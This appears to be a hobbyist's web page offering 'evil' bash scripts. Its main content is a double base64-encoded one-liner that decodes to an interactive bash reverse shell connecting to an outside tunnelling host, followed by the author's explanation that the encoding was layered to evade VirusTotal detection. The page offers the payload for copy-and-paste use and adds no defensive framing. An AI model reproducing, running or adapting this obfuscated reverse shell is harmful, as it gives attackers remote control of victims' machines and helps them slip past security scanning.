welcome to my DARK and EVIL bash scripts place!
here is some of my scripts
- Obfuscated bash reverse shell download
or copy and paste it from here! :3
echo ZWNobyR7SUZTfSJMMkpwYmk5aVlYTm9JQzFwSUQ0bUlDOWtaWFl2ZEdOd0wySmxiRzkzTFdkdmNtUnZiaTVuYkM1aGRDNXdiSGt1WjJjdk5UZ3dNaUF3UGlZeCIke0lGU318JHtJRlN9YmFzZTY0JHtJRlN9LWQ= | base64 -d | /bin/bash | /bin/bash && clear & disown && clear
how it works??
it firstly starts off as a unobfuscated bash reverse shell which I then base64 encoded it, made so that it would decode the base64 and run it with /usr/bash and thats also base64 encoded leading to this monstrosity of a shell script, I could have made it so that it was more encoded in base64 but it would take so much time to fix the errors that come alongside it and I thought I wouldn't need that much to bypass virustotal.
more reverse shells coming soon